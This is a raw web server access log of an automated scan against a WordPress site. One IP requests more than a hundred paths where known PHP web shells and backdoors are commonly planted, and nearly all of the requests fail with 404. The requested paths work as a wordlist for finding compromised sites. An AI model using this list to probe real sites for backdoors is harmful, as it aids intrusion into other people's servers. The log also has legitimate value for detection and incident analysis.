172.200.235.115 - - [30/Mar/2025:15:26:22 -0400] "GET /wp-includes/ID3/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:23 -0400] "GET /img/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:24 -0400] "GET /wp-content/languages/about.php HTTP/1.1" 404 16533 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:25 -0400] "GET /wp-includes/customize/about.php HTTP/1.1" 404 16533 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:25 -0400] "GET /wp-includes.bak/html-api/about.php HTTP/1.1" 404 16533 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:26 -0400] "GET /wp-includes/widgets/about.php HTTP/1.1" 404 16530 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:26 -0400] "GET /wp-includes/IXR/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:27 -0400] "GET /wp-admin/js/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:28 -0400] "GET /.well-known/pki-validation/about.php HTTP/1.1" 404 1251 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:28 -0400] "GET /wp-includes/pomo/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:29 -0400] "GET /wp-includes/block-patterns/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:30 -0400] "GET /wp-content/updraft/about.php HTTP/1.1" 404 16531 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:30 -0400] "GET /wp-content/upgrade-temp-backup/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:31 -0400] "GET /wp-content/themes/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:32 -0400] "GET /wp-admin/includes/about.php HTTP/1.1" 404 16531 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:33 -0400] "GET /images/about.php HTTP/1.1" 404 16531 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:34 -0400] "GET /wp-content/blogs.dir/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:34 -0400] "GET /wp-includes/images/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:35 -0400] "GET /wp-includes/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:36 -0400] "GET /cgi-bin/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:36 -0400] "GET /wp-content/gallery/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:37 -0400] "GET /wp-includes/blocks/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:37 -0400] "GET /wp-admin/css/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:38 -0400] "GET /wp-admin/images/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:39 -0400] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 404 1251 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:39 -0400] "GET /.well-known/acme-challenge/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:39 -0400] "GET /wp-admin/network/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:40 -0400] "GET /cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:40 -0400] "GET /cgi-bin/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:41 -0400] "GET /wp-content/updates.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:41 -0400] "GET /css/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:42 -0400] "GET /wp-admin/user/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:42 -0400] "GET /img/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:43 -0400] "GET /wp-admin/css/colors/coffee/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:44 -0400] "GET /wp-admin/images/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:44 -0400] "GET /avaa.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:45 -0400] "GET /images/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:46 -0400] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:46 -0400] "GET /wp-includes/Requests/Text/admin.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:47 -0400] "GET /wp-admin/css/colors/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:47 -0400] "GET /wp-admin/includes/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:48 -0400] "GET /wp-admin/css/colors/blue/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:48 -0400] "GET /wp-admin/cloud.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:49 -0400] "GET /updates.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:49 -0400] "GET /libraries/legacy/updates.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:50 -0400] "GET /libraries/phpmailer/updates.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:51 -0400] "GET /libraries/vendor/updates.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:51 -0400] "GET /alfa-rex.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:52 -0400] "GET /alfanew.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:53 -0400] "GET /wp-content/plugins/Cache/Cache.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:54 -0400] "GET /wp-admin/js/widgets/about.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:54 -0400] "GET /wp-p.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:55 -0400] "GET /wp-admin/repeater.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:55 -0400] "GET /wp-includes/repeater.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:56 -0400] "GET /wp-content/repeater.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:56 -0400] "GET /wsoyanz.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:57 -0400] "GET /yanz.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:57 -0400] "GET /wp-content/plugins/seoo/wsoyanz.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:58 -0400] "GET /wp-content/plugins/seoo/wsoyanz1.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:26:58 -0400] "GET /cache-compat.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:00 -0400] "GET /ajax-actions.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:00 -0400] "GET /wp-admin/ajax-actions.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:01 -0400] "GET /wp-consar.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:02 -0400] "GET /repeater.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:03 -0400] "GET /admin-post.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:03 -0400] "GET /wp-admin/maint/maint/ajax-actions.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:04 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:04 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:04 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "-" "-"
198.54.114.83 - - [30/Mar/2025:15:27:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743362825.1206660270690917968750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
172.200.235.115 - - [30/Mar/2025:15:27:05 -0400] "GET /dropdown.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:05 -0400] "GET /about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:06 -0400] "GET /admin.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:06 -0400] "GET /about.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:06 -0400] "GET /alfanew.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:07 -0400] "GET /adminfuns.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:07 -0400] "GET /ebs.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:08 -0400] "GET /ws.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:08 -0400] "GET /alfanew2.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:09 -0400] "GET /alfa-rex2.php7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:10 -0400] "GET /wp-admin/images/index.php HTTP/1.1" 301 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:10 -0400] "GET /wp-admin/images/ HTTP/1.1" 403 1242 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:10 -0400] "GET /wp-admin/css/colors/index.php HTTP/1.1" 301 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:10 -0400] "GET /wp-admin/css/colors/ HTTP/1.1" 403 1242 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:10 -0400] "GET /wp-content/themes/pridmag/db.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:11 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:11 -0400] "GET /wp-content/plugins/linkpreview/db.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:12 -0400] "GET /wp-content/themes/seotheme/db.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:12 -0400] "GET /wp-content/plugins/seoplugins/db.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:13 -0400] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:14 -0400] "GET /.well-known/pki-validation/xmrlpc.php HTTP/1.1" 404 1251 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:14 -0400] "GET /.well-known/acme-challenge/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:14 -0400] "GET /wp-admin/network/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:14 -0400] "GET /xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:15 -0400] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:15 -0400] "GET /css/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:16 -0400] "GET /wp-admin/user/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:16 -0400] "GET /img/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:16 -0400] "GET /wp-admin/css/colors/coffee/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:17 -0400] "GET /wp-admin/images/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:17 -0400] "GET /images/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:17 -0400] "GET /wp-admin/js/widgets/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:18 -0400] "GET /wp-admin/css/colors/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:18 -0400] "GET /wp-admin/includes/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:18 -0400] "GET /wp-admin/css/colors/blue/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:18 -0400] "GET /wp-admin/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:19 -0400] "GET /smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:19 -0400] "GET /wp-admin/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:19 -0400] "GET /wp-content/plugins/WordPressCore/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:19 -0400] "GET /wp-includes/images/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:20 -0400] "GET /wp-content/plugins/core-plugin/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:20 -0400] "GET /wp-includes/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:20 -0400] "GET /wp-content/plugins/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:21 -0400] "GET /xt/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:21 -0400] "GET /wp-content/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:21 -0400] "GET /wp-content/themes/twentyfive/smaxx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:22 -0400] "GET /wp-content/upgrade/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:22 -0400] "GET /.well-known/pki-validation/sx.php HTTP/1.1" 404 1251 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:22 -0400] "GET /wp-admin/user/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:22 -0400] "GET /wp-includes/ID3/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:23 -0400] "GET /wp-includes/blocks/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:23 -0400] "GET /sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:23 -0400] "GET /wp-includes/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:24 -0400] "GET /wp-admin/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:24 -0400] "GET /wp-content/plugins/fix/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:24 -0400] "GET /wp-admin/includes/sx.php HTTP/1.1" 404 16533 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:25 -0400] "GET /cgi-bin/sx.php HTTP/1.1" 404 16533 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:25 -0400] "GET /wp-admin/css/sx.php HTTP/1.1" 404 16533 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:26 -0400] "GET /wp-admin/network/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:26 -0400] "GET /wp-includes/block-supports/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:26 -0400] "GET /wp-includes/IXR/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:27 -0400] "GET /.well-known/sx.php HTTP/1.1" 404 16530 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:27 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/fonts/sx.php HTTP/1.1" 404 16530 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:27 -0400] "GET /wp-content/sx.php HTTP/1.1" 404 16530 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:28 -0400] "GET /wp-content/plugins/elementor/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:28 -0400] "GET /.well-known/acme-challenge/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:28 -0400] "GET /wp-includes/js/jcrop/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:29 -0400] "GET /wp-includes/rest-api/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:29 -0400] "GET /wp-admin/images/sx.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:30 -0400] "GET /wp-admin/css/colors/blue/blue.php HTTP/1.1" 404 16531 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:30 -0400] "GET /chosen HTTP/1.1" 404 16531 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:30 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:30 -0400] "GET /install.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:31 -0400] "GET /wp-includes/images/include.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:31 -0400] "GET /gel4y.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:31 -0400] "GET /comfunctions.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:32 -0400] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:32 -0400] "GET /wp-content/themes/wp-classic/inc/index.php HTTP/1.1" 301 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:32 -0400] "GET /wp-content/themes/wp-classic/inc/ HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:32 -0400] "GET /assets/images/1p.php HTTP/1.1" 404 16531 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:33 -0400] "GET /class.api.php HTTP/1.1" 404 16531 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:33 -0400] "GET /plugin.php HTTP/1.1" 404 16531 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:33 -0400] "GET /wp-mail.php HTTP/1.1" 403 1123 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:33 -0400] "GET /cong.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:34 -0400] "GET /wp-content/index.php HTTP/1.1" 200 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:34 -0400] "GET /.well-known/acme-challenge/xmrlpc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:34 -0400] "GET /wp-configs.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:34 -0400] "GET /mah.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:34 -0400] "GET /defaults.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:35 -0400] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:35 -0400] "GET /input.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:35 -0400] "GET /admin-ajax.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:36 -0400] "GET /0z.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:36 -0400] "GET /media.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:36 -0400] "GET /chosen.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:36 -0400] "GET /wp-includes/fonts/wp-login.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:37 -0400] "GET /wp-admin/users.php HTTP/1.1" 302 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:37 -0400] "GET /wp-content/uploads/cache.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:38 -0400] "GET /.well-known/pki-validation/file.php HTTP/1.1" 404 1251 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:38 -0400] "GET /.wp-cli/wp-login.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:38 -0400] "GET /authorize.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:38 -0400] "GET /wp-admin/css/colors/blue/CasperExV1.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:38 -0400] "GET /wp-admin/includes/users.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:39 -0400] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 301 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:39 -0400] "GET /wp-content/plugins/revslider/includes/external/page/ HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:39 -0400] "GET /wp.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:39 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:40 -0400] "GET /wp-2019.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:40 -0400] "GET /upload.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:40 -0400] "GET /themes.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:40 -0400] "GET /wp-admin/network/index.php HTTP/1.1" 302 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:41 -0400] "GET /wp-content/plugins/WordPressCore/blkfqnikz.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:41 -0400] "GET /wp/wp-admin/includes/class-wp-page-mvb2yr.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:41 -0400] "GET /content.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:42 -0400] "GET /st.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:42 -0400] "GET /wp-includes/images/smilies/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:42 -0400] "GET /simple.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:42 -0400] "GET /function.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:43 -0400] "GET /ynz.PhP7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:43 -0400] "GET /wp-content/style-css.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:43 -0400] "GET /wp-includes/IXR/wp-login.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:44 -0400] "GET /.well-known/acme-challenge/about.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:44 -0400] "GET /wordpress/wp-includes/IXR/allez.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:44 -0400] "GET /rendixd.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:45 -0400] "GET /wp-admin/css/admin.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:45 -0400] "GET /filefuns.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:45 -0400] "GET /options.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:45 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/index.php HTTP/1.1" 301 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:45 -0400] "GET /wp-includes/js/tinymce/skins/lightgray/img/ HTTP/1.1" 403 1242 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:46 -0400] "GET /edit.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:46 -0400] "GET /user.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:46 -0400] "GET /worm0.PhP7 HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:46 -0400] "GET /wp-includes/js/tinymce/skins/wordpress/images/index.php HTTP/1.1" 301 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:46 -0400] "GET /wp-includes/js/tinymce/skins/wordpress/images/ HTTP/1.1" 403 1242 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:47 -0400] "GET /.well-known//.well-known/owlmailer.php HTTP/1.1" 301 0 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:47 -0400] "GET /.well-known/.well-known/owlmailer.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:47 -0400] "GET /wp-content/uploads/cong.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:47 -0400] "GET /01.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:47 -0400] "GET /wp-content/uploads/wp-login.php.suspected HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:48 -0400] "GET /wp-includes/rest-api/endpoints/html.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:48 -0400] "GET /wp-admin/js/widgets/cong.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:48 -0400] "GET /doc.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:48 -0400] "GET /ws.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:49 -0400] "GET /link.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:49 -0400] "GET /autoload_classmap.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:49 -0400] "GET /wp-admin/js/privacy-tools.min.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:50 -0400] "GET /wp-includes/pomo/wp-login.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:50 -0400] "GET /db.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:50 -0400] "GET /wp-content/uploads/error_log.php HTTP/1.1" 404 16532 "-" "-"
172.200.235.115 - - [30/Mar/2025:15:27:50 -0400] "GET /google.php HTTP/1.1" 404 16532 "-" "-"
